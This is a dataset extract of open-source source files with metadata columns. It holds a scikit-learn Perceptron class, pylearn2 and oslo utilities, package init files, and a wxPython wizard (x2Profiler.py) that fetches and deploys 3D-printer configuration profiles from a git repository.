repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
altairpearl/scikit-learn | sklearn/linear_model/perceptron.py | 39 | 3863 | # Author: Mathieu Blondel
# License: BSD 3 clause
from .stochastic_gradient import BaseSGDClassifier
from ..feature_selection.from_model import _LearntSelectorMixin
class Perceptron(BaseSGDClassifier, _LearntSelectorMixin):
"""Perceptron
Read more in the :ref:`User Guide <perceptron>`.
Parameters
----------
penalty : None, 'l2' or 'l1' or 'elasticnet'
The penalty (aka regularization term) to be used. Defaults to None.
alpha : float
Constant that multiplies the regularization term if regularization is
used. Defaults to 0.0001
fit_intercept : bool
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered. Defaults to True.
n_iter : int, optional
The number of passes over the training data (aka epochs).
Defaults to 5.
shuffle : bool, optional, default True
Whether or not the training data should be shuffled after each epoch.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
verbose : integer, optional
The verbosity level
n_jobs : integer, optional
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation. -1 means 'all CPUs'. Defaults
to 1.
eta0 : double
Constant by which the updates are multiplied. Defaults to 1.
class_weight : dict, {class_label: weight} or "balanced" or None, optional
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
coef_ : array, shape = [1, n_features] if n_classes == 2 else [n_classes,\
n_features]
Weights assigned to the features.
intercept_ : array, shape = [1] if n_classes == 2 else [n_classes]
Constants in decision function.
Notes
-----
`Perceptron` and `SGDClassifier` share the same underlying implementation.
In fact, `Perceptron()` is equivalent to `SGDClassifier(loss="perceptron",
eta0=1, learning_rate="constant", penalty=None)`.
See also
--------
SGDClassifier
References
----------
https://en.wikipedia.org/wiki/Perceptron and references therein.
"""
def __init__(self, penalty=None, alpha=0.0001, fit_intercept=True,
n_iter=5, shuffle=True, verbose=0, eta0=1.0, n_jobs=1,
random_state=0, class_weight=None, warm_start=False):
super(Perceptron, self).__init__(loss="perceptron",
penalty=penalty,
alpha=alpha, l1_ratio=0,
fit_intercept=fit_intercept,
n_iter=n_iter,
shuffle=shuffle,
verbose=verbose,
random_state=random_state,
learning_rate="constant",
eta0=eta0,
power_t=0.5,
warm_start=warm_start,
class_weight=class_weight,
n_jobs=n_jobs)
| bsd-3-clause | -653,435,787,549,262,000 | 35.790476 | 78 | 0.574165 | false |
pkainz/pylearn2 | pylearn2/scripts/jobman/tester.py | 44 | 3126 | """
This an example script inserting a pylearn2 yaml code into a jobman database.
The code below defines a yaml template string in state.yaml_template,
and the values of its hyper-parameters in state.hyper_parameters, and
run the code that is located in state.extract_results on this model
using jobman.
Actually, we add the job here and it can be launched later as usual
(please check how to start jobs using jobman from the jobman tutorial
website)
"""
from nose.plugins.skip import SkipTest
try:
from jobman.tools import DD, flatten
from jobman import api0, sql
except ImportError:
raise SkipTest()
from pylearn2.scripts.jobman import experiment
def result_extractor(train_obj):
"""
This is a user specific function, that is used by jobman to extract results
The returned dictionary will be saved in state.results
"""
import numpy
channels = train_obj.model.monitor.channels
train_cost = channels['sgd_cost(ExhaustiveSGD[X])']
best_epoch = numpy.argmin(train_cost.val_record)
best_rec_error = train_cost.val_record[best_epoch]
batch_num = train_cost.batch_record[best_epoch]
return dict(
best_epoch=best_epoch,
train_rec_error=best_rec_error,
batch_num=batch_num)
if __name__ == '__main__':
db = api0.open_db('sqlite:///test.db?table=test_jobman_pylearn2')
state = DD()
state.yaml_template = '''
!obj:pylearn2.train.Train {
"dataset": !obj:pylearn2.datasets.npy_npz.NpyDataset &dataset {
"file" : "%(file)s"
},
"model": !obj:pylearn2.autoencoder.ContractiveAutoencoder {
"nvis" : %(nvis)d,
"nhid" : %(nhid)d,
"irange" : 0.05,
"act_enc": "sigmoid", #for some reason only sigmoid function works
"act_dec": "sigmoid",
},
"algorithm": !obj:pylearn2.training_algorithms.sgd.SGD {
"learning_rate" : %(learning_rate)f,
"batch_size" : %(batch_size)d,
"monitoring_batches" : 5,
"monitoring_dataset" : *dataset,
"cost" : !obj:pylearn2.costs.cost.SumOfCosts {
"costs": [
[1.0, !obj:pylearn2.costs.autoencoder.MeanBinaryCrossEntropy {} ],
[%(coefficient)f, !obj:pylearn2.costs.cost.MethodCost { method: 'contraction_penalty' } ]
]
},
"termination_criterion" : %(term_crit)s,
}
}
'''
state.hyper_parameters = {
"file": "${PYLEARN2_DATA_PATH}/UTLC/pca/sylvester_train_x_pca32.npy",
"nvis": 32,
"nhid": 6,
"learning_rate": 0.1,
"batch_size": 10,
"coefficient": 0.5,
"term_crit": {
"__builder__": "pylearn2.training_algorithms.sgd.EpochCounter",
"max_epochs": 2
}
}
state.extract_results = "pylearn2.scripts.jobman.tester.result_extractor"
sql.insert_job(
experiment.train_experiment,
flatten(state),
db,
force_dup=True)
| bsd-3-clause | -3,797,899,547,524,971,500 | 31.226804 | 109 | 0.590211 | false |
shadda/AutobahnPython | autobahn/autobahn/__init__.py | 7 | 1043 | ###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from _version import __version__
version = __version__ # backward compat.
import util
import useragent
import flashpolicy
import httpstatus
import utf8validator
import xormasker
import websocket
import resource
import prefixmap
import wamp
| apache-2.0 | -8,729,113,815,589,294,000 | 31.645161 | 79 | 0.615532 | false |
esse-io/zen-common | oslo-modules/oslo_context/fixture.py | 3 | 1505 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
from oslo_context import context
class ClearRequestContext(fixtures.Fixture):
"""Clears any cached RequestContext
This resets RequestContext at the beginning and end of tests that
use this fixture to ensure that we have a clean slate for running
tests, and that we leave a clean slate for other tests that might
run later in the same process.
"""
def setUp(self):
super(ClearRequestContext, self).setUp()
# we need to clear both when we start, and when we finish,
# because there might be other tests running that don't handle
# this correctly.
self._remove_cached_context()
self.addCleanup(self._remove_cached_context)
def _remove_cached_context(self):
"""Remove the thread-local context stored in the module."""
try:
del context._request_store.context
except AttributeError:
pass
| apache-2.0 | -5,009,131,992,932,061,000 | 36.625 | 78 | 0.695681 | false |
ehirt/odoo | addons/mrp/report/__init__.py | 378 | 1122 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import price
import workcenter_load
import bom_structure
import mrp_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -7,418,274,346,170,354,000 | 39.071429 | 78 | 0.62656 | false |
dob71/x2swn | x2Profiler.py | 1 | 38339 | #!/usr/bin/env python
#
# This file is part of the X2SW bundle. You can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import wx
import wx.wizard as wiz
import re
import tempfile
import shutil
from dulwich.client import get_transport_and_path
from dulwich.errors import ApplyDeltaError
from dulwich.index import Index, build_index_from_tree
from dulwich.pack import Pack, sha_to_hex
from dulwich.repo import Repo
from dulwich.server import update_server_info
from dulwich import client
VERSION_FILE = 'version.txt'
COMPAT_FILE = '.compat_ver_str.txt'
pronterface_restart = False
########################################################################
class TitledPage(wiz.WizardPageSimple):
""""""
#----------------------------------------------------------------------
def __init__(self, parent, title):
"""Constructor"""
wiz.WizardPageSimple.__init__(self, parent)
sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer = sizer
self.SetSizer(sizer)
title = wx.StaticText(self, -1, title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
sizer.Add(title, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND|wx.ALL, 5)
########################################################################
class UpdateRepoPage(wiz.PyWizardPage):
"""Startup wizard page"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sizer.Add(wx.StaticText(self, -1, "\
This wizard helps you select and deploy X2SW profiles for your printer. Each\n\
X2SW profile contains configuration files for multiple software components\n\
(Slic3r profiles, Skeinforge profiles, Pronterface rc file).\n\
\n\
The profiles from either the online or local X2SW profile repository can be\n\
deployed. When deployed the profile files override the currently active\n\
configuration files of the software included in X2SW bundle."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.offline_mode = wx.CheckBox(self, wx.ID_ANY, 'Use local repository (off-line mode)')
self.sizer.Add(self.offline_mode)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
x2ProfilerApp.repo = None
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
except:
wx.MessageBox('Unable to delete: ' + x2ProfilerApp.tmp_repo_path, '', style = wx.OK|wx.ICON_EXCLAMATION)
pass
x2ProfilerApp.tmp_repo_path = None
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
if not self.offline_mode.GetValue():
return self.next
else:
return self.next.GetNext()
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# If no temp repo then we need to use the local one
global x2ProfilerApp
try:
if self.offline_mode.GetValue():
x2ProfilerApp.repo = Repo(x2ProfilerApp.x2swProfilesPath)
else:
x2ProfilerApp.tmp_repo_path = tempfile.mkdtemp()
x2ProfilerApp.repo = Repo.init(x2ProfilerApp.tmp_repo_path)
except:
pass
if x2ProfilerApp.repo == None:
event.Veto()
########################################################################
class DownloadingPage(wiz.PyWizardPage):
"""Wizard page for updating the profiles repo"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.status = wx.StaticText(self, -1, "Downloading from " + x2ProfilerApp.repo_url + "...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.count = 0
self.gauge = wx.Gauge(self, -1, 100, size = (250, 25))
self.sizer.Add(self.gauge)
self.gauge.SetBezelFace(3)
self.gauge.SetShadowWidth(3)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.lasttopic = None
self.msgbuf = ''
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.Show()
self.GetParent().Update()
try:
self.cmd_fetch(x2ProfilerApp.repo, x2ProfilerApp.repo_url)
self.gauge.SetValue(100)
self.status.SetLabel('Done fetching from ' + x2ProfilerApp.repo_url)
except Exception as e:
self.status.SetLabel('Failure to create temporary repository for:\n' + x2ProfilerApp.repo_url)
self.gauge.SetValue(0)
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
#----------------------------------------------------------------------
def flush(self, msg=None):
if self.lasttopic:
self.status.SetLabel(self.lasttopic)
self.gauge.SetValue(0)
self.lasttopic = None
if msg:
self.status.SetLabel(msg)
#----------------------------------------------------------------------
# as it is done in hggit (not sure why it has to be so complex...)
def progress(self, msg):
# Counting objects: 3, done.
# Compressing objects: 100% (3/3), done.
# Total 3 (delta 0), reused 0 (delta 0)
msgs = re.split('[\r\n]', self.msgbuf + msg)
self.msgbuf = msgs.pop()
for msg in msgs:
### for debugging ### print 'msg:' + msg + '\n'
td = msg.split(':', 1)
data = td.pop()
if not td:
self.flush(data)
continue
topic = td[0]
m = re.search('\((\d+)/(\d+)\)', data)
if m:
if self.lasttopic and self.lasttopic != topic:
self.flush()
self.lasttopic = topic
pos, total = map(int, m.group(1, 2))
try:
perc = int((pos * 100) / total)
except:
perc = 0
self.gauge.SetValue(perc)
else:
self.flush(msg)
self.Show()
self.GetParent().Update()
#----------------------------------------------------------------------
def cmd_fetch(self, r, url_path):
c, path = get_transport_and_path(url_path)
c._fetch_capabilities.remove('thin-pack')
### for debugging ### c = client.SubprocessGitClient(thin_packs=False)
path = url_path
determine_wants = r.object_store.determine_wants_all
refs = c.fetch(path, r, progress=self.progress)
for k in refs.keys():
if k[-3:] == '^{}': # Annotated tag ref
k = k[:-3]
r[k] = refs[k]
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class SelectProfilesPage(wiz.PyWizardPage):
"""Wizard page for selecting what profiles to deploy"""
REF_TYPE_TAG = 1
REF_TYPE_HEAD = 2
REF_TYPE_RHEAD = 3
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.under_title_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.tree_title = wx.StaticText(self, -1, "Select the printer profile")
self.under_title_sizer.Add(self.tree_title, 1, wx.ALL|wx.ALIGN_LEFT, 0)
self.show_all = wx.CheckBox(self, wx.ID_ANY, 'Show All')
self.show_all.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.all = False
self.under_title_sizer.Add(self.show_all, 0, wx.ALL|wx.ALIGN_RIGHT, 0)
self.sizer.Add(self.under_title_sizer, 0, wx.ALL|wx.EXPAND, 5)
self.tree = wx.TreeCtrl(self, -1, style = wx.TR_HAS_BUTTONS|wx.TR_HAS_VARIABLE_ROW_HEIGHT)
image_list = wx.ImageList(16, 16)
self.profile = image_list.Add(wx.Image("images/profile.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_rb = image_list.Add(wx.Image("images/profile_rb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_lb = image_list.Add(wx.Image("images/profile_lb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.folder = image_list.Add(wx.Image("images/folder.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.tree.AssignImageList(image_list)
self.sizer.Add(self.tree, 2, wx.EXPAND)
self.sizer.Add(wx.StaticText(self, -1, "Selected profile description:"), 0, wx.ALL, 5)
self.descript = wx.TextCtrl(self, -1, '', style = wx.TE_READONLY | wx.TE_MULTILINE)
self.sizer.Add(self.descript, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.selection = None
#----------------------------------------------------------------------
def fillTree(self, refsList, path, node):
for item_name,item_file,ref_type in refsList[path]:
child_path = path + '/' + item_name
if ref_type == self.REF_TYPE_TAG:
child_ref_path = 'refs/tags' + child_path[4:]
prof_image = self.profile
elif ref_type == self.REF_TYPE_HEAD:
child_ref_path = 'refs/heads' + child_path[4:]
prof_image = self.profile_lb
elif ref_type == self.REF_TYPE_RHEAD:
child_ref_path = 'refs/remotes/origin' + child_path[4:]
prof_image = self.profile_rb
### for debugging ### print child_ref_path
child = self.tree.AppendItem(node, item_name)
if item_file:
child_ref_sha = self.refs[child_ref_path]
self.tree.SetPyData(child, child_ref_sha)
self.tree.SetItemImage(child, prof_image, wx.TreeItemIcon_Normal)
else:
self.tree.SetItemImage(child, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key(child_path):
self.fillTree(refsList, child_path, child)
#----------------------------------------------------------------------
def Run(self):
# Prepare a tree-structured dictionary of refs paths
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
refsList = {}
# Make remote origin heads look similar to tags and local heads
refkeys = ['refs/rheads'+item[19:] if item[:19]=='refs/remotes/origin' else item for item in self.refs.keys()]
reflist = sorted(sorted(refkeys),key=lambda x: -len(x.split('/')))
### for debugging #### print reflist
for ref in reflist:
parts = ref.split('/')
# We only use refs that have format refs/<tags|heads|rheads>/vX.X.X.X/<type>/...
# Filter out one-level refs and anything that is neither tag or head
if parts[0] != 'refs' or len(parts) <= 4:
continue
if parts[1] != 'tags' and parts[1] != 'heads' and parts[1] != 'rheads':
continue
# Is it a tag, a local branch head or remote branch head?
ref_type = self.REF_TYPE_TAG
if parts[1] == 'heads':
ref_type = self.REF_TYPE_HEAD
elif parts[1] == 'rheads':
ref_type = self.REF_TYPE_RHEAD
ver_prefix = parts[2]
if not self.all and not ver_prefix.startswith('v' + x2ProfilerApp.ver_match_str):
continue
parts[1] = 'root'
for ii in range(2, len(parts)):
key = '/'.join(parts[1:ii])
# see if already have the node path we are about to add
if refsList.has_key(key + '/' + parts[ii]):
continue
# build reference key
# If at the end of the branch (i.e. the tag/head ref file name)
file_ref = False
if ii >= len(parts)-1:
file_ref = True
# Still going down the ref's path...
# If we already started ading items to this subtree
if refsList.has_key(key):
refsList[key].append([parts[ii],file_ref,ref_type])
else:
refsList[key]=[[parts[ii],file_ref,ref_type]]
### for debugging ### print 'ii: '+ str(ii) +' ### key: ' + key + ' ### add: ' + parts[ii]
# Build the UI tree (can do it above, but cleaner to separate)
self.tree.DeleteAllItems()
root_str = "FDM 3D Printer Profiles for X2SW"
if self.all or len(x2ProfilerApp.ver[0]) == 0:
root_str = root_str + " (all versions)"
else:
root_str = root_str + " v" + x2ProfilerApp.ver[0]
root = self.tree.AddRoot(root_str)
self.tree.SetItemImage(root, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key('root'):
self.fillTree(refsList, 'root', root)
self.tree.Expand(root)
# On/off next button based on either a profile was selected or not
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged, self.tree)
if self.selection != None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnSelChanged(self, event):
global x2ProfilerApp
self.selection = self.tree.GetPyData(event.GetItem())
if self.selection != None:
try:
self.ShowDescription(self.selection)
x2ProfilerApp.selection = self.selection
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
except:
x2ProfilerApp.selection = None
self.descript.SetValue('')
pass
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
x2ProfilerApp.selection = None
self.descript.SetValue('')
event.Skip()
#----------------------------------------------------------------------
def ShowDescription(self, ref):
o = self.repo[ref]
if o.type_name == 'tag':
message = 'By: ' + o.tagger + '\n'
#message += 'Type: annotated tag\n'
message += o.message
elif o.type_name == 'commit':
message = 'By: ' + o.author + '\n'
#message += 'Type: tagged commit\n'
message += o.message
self.descript.SetValue(message)
#----------------------------------------------------------------------
def onCheckbox(self, event):
self.all = self.show_all.GetValue()
self.Run()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ChooseModePage(wiz.PyWizardPage):
"""Wizard page for managing in-place mode"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
This page helps to control where the X2SW profile configuration files are stored.\n\
If the \"in-place\" mode is ON all the included software stores the config files\n\
locally under \".x2sw\" in X2SW installation folder. If it is OFF the files are\n\
stored under \".x2sw\" in the user home folder.\n\
\n\
The \"in-place\" mode is configured per user account and applies to all installed\n\
copies of the X2SW bundle. The deployment path for the mode chosen is shown above.\n\
\n\
If you want to change the \"in-place\" mode setting and skip the profile deployment\n\
step, cancel the wizard after choosing the desired mode."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.inplace_mode = wx.CheckBox(self, wx.ID_ANY, 'Use In-Place mode')
self.sizer.Add(self.inplace_mode)
if os.path.exists(os.path.join(os.path.expanduser('~'), '.x2sw', '.use_local')):
self.inplace_mode.SetValue(True)
self.inplace_mode.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection == None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
global x2ProfilerApp
inplace_path = os.path.join(os.path.expanduser('~'), '.x2sw')
inplace_file = os.path.join(inplace_path, '.use_local')
if not os.path.exists(inplace_path):
os.mkdir(inplace_path)
if self.inplace_mode.IsChecked():
with file(inplace_file, 'a'):
pass
else:
os.remove(inplace_file)
x2ProfilerApp.changes = True
x2ProfilerApp.DetermineProfilesPaths()
self.UpdatePageUi()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class DeployPage(wiz.PyWizardPage):
"""Wizard page confirming what where to deploy"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
When you click \"Next\" the content of the X2SW profile selected will override\n\
the configuration files of the all X2SW software components under the \"Deployment\n\
path\". When ready confirm that you'd like to deploy and continue to the next page.\n\
\n\
WARNING: All the user files (if any) under the \"Deployment path\" will be lost!!!"), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.deploy_profile = wx.CheckBox(self, wx.ID_ANY, 'Deploy profile')
self.sizer.Add(self.deploy_profile)
self.deploy_profile.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
self.deploy_profile.SetValue(False)
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
if self.selection != None:
self.deploy_profile.Enable()
else:
self.deploy_profile.Disable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
if self.deploy_profile.IsChecked():
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# Disable buttons as we moving forward
if event.GetDirection():
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ReportResultPage(wiz.PyWizardPage):
"""Wizard page completing the deployment"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.status = wx.StaticText(self, -1, "Processing...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def afterRun(self):
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
#----------------------------------------------------------------------
def Run(self):
self.status.SetLabel("Processing...")
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
self.Show()
self.GetParent().Update()
if not x2ProfilerApp.page5.deploy_profile.IsChecked():
self.status.SetLabel("No changes performed, no profile selected!")
else:
try:
self.DoDeploy(self.selection)
self.status.SetLabel("The operation has completed successfully.")
except Exception as e:
self.status.SetLabel("\
The operation has failed! If using Windows in-place profile storage try to run\n\
the X2SW app in Windows XP(SP 2) compatibility mode or run it as Administrator.\n\
You can also cd to X2SW profiles folder and use GIT to check out the desired\n\
profile manually or attempt to diagnose and fix the issue.")
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
x2ProfilerApp.changes = True
self.Show()
self.GetParent().Update()
wx.CallAfter(self.afterRun)
#----------------------------------------------------------------------
def DoDeploy(self, ref):
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
o = self.repo[ref]
while o.type_name == 'tag':
type_name, sha = o._get_object()
o = self.repo.get_object(sha)
if not o.type_name == 'commit':
raise ValueError('Unable to find the tagged commit!')
# We can only do a clean checkout, so clenaup
self.RmAllProfiles(x2ProfilerApp.x2swProfilesPath)
